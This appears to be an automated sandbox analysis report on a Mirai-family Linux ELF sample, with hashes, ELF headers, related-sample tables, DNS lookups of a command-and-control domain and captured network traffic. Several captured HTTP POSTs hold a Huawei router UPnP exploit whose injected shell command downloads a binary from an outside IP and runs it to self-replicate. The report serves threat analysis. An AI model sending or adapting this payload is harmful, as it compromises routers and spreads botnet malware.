                    unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                    166.191.198.30
                    unknownUnited States
                    20057ATT-MOBILITY-LLC-AS20057USfalse
                    36.70.76.253
                    unknownIndonesia
                    7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDfalse
                    81.145.172.133
                    unknownUnited Kingdom
                    2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                    218.212.152.30
                    unknownSingapore
                    55430STARHUB-NGNBNStarhubLtdSGfalse
                    65.189.201.236
                    unknownUnited States
                    10796TWC-10796-MIDWESTUSfalse
                    90.120.253.101
                    unknownFrance
                    3215FranceTelecom-OrangeFRfalse
                    139.105.191.164
                    unknownNorway
                    5619EVRY-NOfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    197.33.61.264E2ggD3VyS.elfGet hashmaliciousMiraiBrowse
                      djRl6t3LqhGet hashmaliciousMiraiBrowse
                        197.2.84.155arm7Get hashmaliciousMiraiBrowse
                          140.192.156.25316sbYI4aDX.elfGet hashmaliciousUnknownBrowse
                            31.212.1.217FseQ36lw3F.elfGet hashmaliciousUnknownBrowse
                              197.237.201.146C7HOMrngD8.elfGet hashmaliciousMirai, MoobotBrowse
                                gZivkvVc46.elfGet hashmaliciousMirai, MoobotBrowse
                                  a5Awf2XPmL.elfGet hashmaliciousMirai, MoobotBrowse
                                    arm7-20220921-0518.elfGet hashmaliciousMirai, MoobotBrowse
                                      41.237.139.178huhu.arm5.elfGet hashmaliciousMiraiBrowse
                                        i586.elfGet hashmaliciousMiraiBrowse
                                          SWPwJg76p2.elfGet hashmaliciousMirai, MoobotBrowse
                                            t2pO72ceGk.elfGet hashmaliciousMirai, MoobotBrowse
                                              4IP0JJ1OXh.elfGet hashmaliciousMirai, MoobotBrowse
                                                2HZagEp1Bi.elfGet hashmaliciousMirai, MoobotBrowse
                                                  75.91.102.40arm.elfGet hashmaliciousMiraiBrowse
                                                    197.12.117.144bot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                      157.148.128.77ftIGtsgqN3.elfGet hashmaliciousMirai, MoobotBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        cnc.bobungbu.comabkzsHZ00o.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 103.177.35.32
                                                        wO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 103.177.35.32
                                                        xc1gRf4odZ.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 103.177.35.32
                                                        Ixq2ypphWQ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 103.177.35.32
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MERLIN-NETCAQpp5L1vHC0.elfGet hashmaliciousUnknownBrowse
                                                        • 216.73.67.78
                                                        yzIY5KFJSu.elfGet hashmaliciousMiraiBrowse
                                                        • 216.73.67.66
                                                        fPW7tc1Xvh.elfGet hashmaliciousMiraiBrowse
                                                        • 142.13.225.211
                                                        0KsZkcNqWz.elfGet hashmaliciousMiraiBrowse
                                                        • 142.13.95.184
                                                        sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 216.73.67.108
                                                        aILzoYwXdz.elfGet hashmaliciousMiraiBrowse
                                                        • 142.13.77.134
                                                        UQE31l3N6I.elfGet hashmaliciousMiraiBrowse
                                                        • 142.13.225.215
                                                        a5EUZjIppN.elfGet hashmaliciousMiraiBrowse
                                                        • 216.73.67.41
                                                        FH8EJ7g2Sb.elfGet hashmaliciousMiraiBrowse
                                                        • 142.13.77.105
                                                        a5b0L85aum.elfGet hashmaliciousMiraiBrowse
                                                        • 142.13.77.109
                                                        TE-ASTE-ASEGabkzsHZ00o.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 197.55.171.149
                                                        wO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 197.44.30.118
                                                        xc1gRf4odZ.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 41.35.35.130
                                                        Ixq2ypphWQ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 197.49.247.228
                                                        0xh0roxxnavebusyoo.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 156.211.246.134
                                                        JLJkT6Xg7I.elfGet hashmaliciousMiraiBrowse
                                                        • 197.55.171.157
                                                        Mt5VyD087r.elfGet hashmaliciousMiraiBrowse
                                                        • 156.215.141.70
                                                        TfRuTBn5oX.elfGet hashmaliciousUnknownBrowse
                                                        • 41.37.106.93
                                                        i6bCVSCWc1.elfGet hashmaliciousMiraiBrowse
                                                        • 197.60.132.88
                                                        863Oc9fFgF.elfGet hashmaliciousMiraiBrowse
                                                        • 197.36.57.137
                                                        DEPAULUS16sbYI4aDX.elfGet hashmaliciousUnknownBrowse
                                                        • 140.192.156.253
                                                        y7wPhewB9V.elfGet hashmaliciousMiraiBrowse
                                                        • 140.192.19.255
                                                        lB9ZXOQaP3.elfGet hashmaliciousMiraiBrowse
                                                        • 75.102.236.215
                                                        huhu.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 140.192.231.95
                                                        FRk8v7hJka.elfGet hashmaliciousMiraiBrowse
                                                        • 140.192.255.53
                                                        1Zjd2hj8Zm.elfGet hashmaliciousMiraiBrowse
                                                        • 75.102.196.119
                                                        mirai.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 75.102.254.253
                                                        BwdUBAkBHE.elfGet hashmaliciousMoobotBrowse
                                                        • 75.102.254.250
                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 140.192.160.4
                                                        HMTZS4AZLA.elfGet hashmaliciousMiraiBrowse
                                                        • 140.192.244.212
                                                        TOPNETTNIxq2ypphWQ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 41.226.143.35
                                                        8PRlezZSuB.elfGet hashmaliciousUnknownBrowse
                                                        • 102.159.88.191
                                                        URocnz2wNj.elfGet hashmaliciousUnknownBrowse
                                                        • 41.230.97.149
                                                        V4zFzdCyty.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 197.3.15.240
                                                        6T1S0q3QLa.elfGet hashmaliciousMiraiBrowse
                                                        • 197.3.15.242
                                                        bot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 197.244.44.243
                                                        bot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 41.230.163.216
                                                        AsrP4dFOgM.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 197.240.178.169
                                                        gJlGkncVHO.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 41.230.97.129
                                                        j55aXfhPv3.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 197.0.187.73
                                                        No context
                                                        No context
                                                        No created / dropped files found
                                                        File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                        Entropy (8bit):5.2978209372247465
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:KlgUGKamBf.elf
                                                        File size:156'120 bytes
                                                        MD5:2ce7f9b1c5f2f9bb05180465a8de74e8
                                                        SHA1:7b8a1a6adee4cffaf812f693eff98a786461fe75
                                                        SHA256:850ca89c53804ddc86474891ac3dc273c2b09573045b4bedcdf99a5a85c1417d
                                                        SHA512:880cf4919771a27a8b9981d6509bfa375b4a1ed1562ea0b46181df1fea5931dffe4ef05f070c047560ab221749cc9d136e5573ee6ecb7602fa20d4247677aa4d
                                                        SSDEEP:3072:TB3U6eEuCfMmtH+CImOtv6aEPDyJOx1nD6vcGejkbHTOXbXtO:TBE6eEuCfMmh+AJabxajtO
                                                        TLSH:E2E34907F5C1C4FDC4DAC1744B9EA63ADD32B49D0238B16B2BC4AA221E5DE315F2EA54
                                                        File Content Preview:.ELF..............>.......@.....@.......X_..........@.8...@.......................@.......@...............................................Q.......Q.............................Q.td....................................................H...._....j...H........

                                                        ELF header

                                                        Class:ELF64
                                                        Data:2's complement, little endian
                                                        Version:1 (current)
                                                        Machine:Advanced Micro Devices X86-64
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:UNIX - System V
                                                        ABI Version:0
                                                        Entry Point Address:0x400194
                                                        Flags:0x0
                                                        ELF Header Size:64
                                                        Program Header Offset:64
                                                        Program Header Size:56
                                                        Number of Program Headers:3
                                                        Section Header Offset:155480
                                                        Section Header Size:64
                                                        Number of Section Headers:10
                                                        Header String Table Index:9
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                        .textPROGBITS0x4001000x1000x18a960x00x6AX0016
                                                        .finiPROGBITS0x418b960x18b960xe0x00x6AX001
                                                        .rodataPROGBITS0x418bc00x18bc00x39e00x00x2A0032
                                                        .ctorsPROGBITS0x51d0000x1d0000x180x00x3WA008
                                                        .dtorsPROGBITS0x51d0180x1d0180x100x00x3WA008
                                                        .dataPROGBITS0x51d0400x1d0400x8ed80x00x3WA0032
                                                        .bssNOBITS0x525f200x25f180x70a00x00x3WA0032
                                                        .shstrtabSTRTAB0x00x25f180x3e0x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x4000000x4000000x1c5a00x1c5a06.42500x5R E0x100000.init .text .fini .rodata
                                                        LOAD0x1d0000x51d0000x51d0000x8f180xffc00.24770x6RW 0x100000.ctors .dtors .data .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        May 28, 2024 08:59:03.261717081 CEST192.168.2.238.8.8.80xf71aStandard query (0)cnc.bobungbu.comA (IP address)IN (0x0001)false
                                                        May 28, 2024 08:59:11.312721014 CEST192.168.2.238.8.8.80xc313Standard query (0)cnc.bobungbu.comA (IP address)IN (0x0001)false
                                                        May 28, 2024 08:59:13.332957029 CEST192.168.2.238.8.8.80xac54Standard query (0)cnc.bobungbu.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        May 28, 2024 08:59:03.274487019 CEST8.8.8.8192.168.2.230xf71aNo error (0)cnc.bobungbu.com103.177.35.32A (IP address)IN (0x0001)false
                                                        May 28, 2024 08:59:11.321835995 CEST8.8.8.8192.168.2.230xc313No error (0)cnc.bobungbu.com103.177.35.32A (IP address)IN (0x0001)false
                                                        May 28, 2024 08:59:13.341428995 CEST8.8.8.8192.168.2.230xac54No error (0)cnc.bobungbu.com103.177.35.32A (IP address)IN (0x0001)false
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.2339404157.174.221.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276199102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.2341908197.211.102.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276206017 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.2347344157.97.154.20237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276213884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.2338034157.250.209.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276235104 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.233588441.71.18.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276273966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.2360170157.69.76.437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276282072 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.2356686171.223.225.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276473999 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
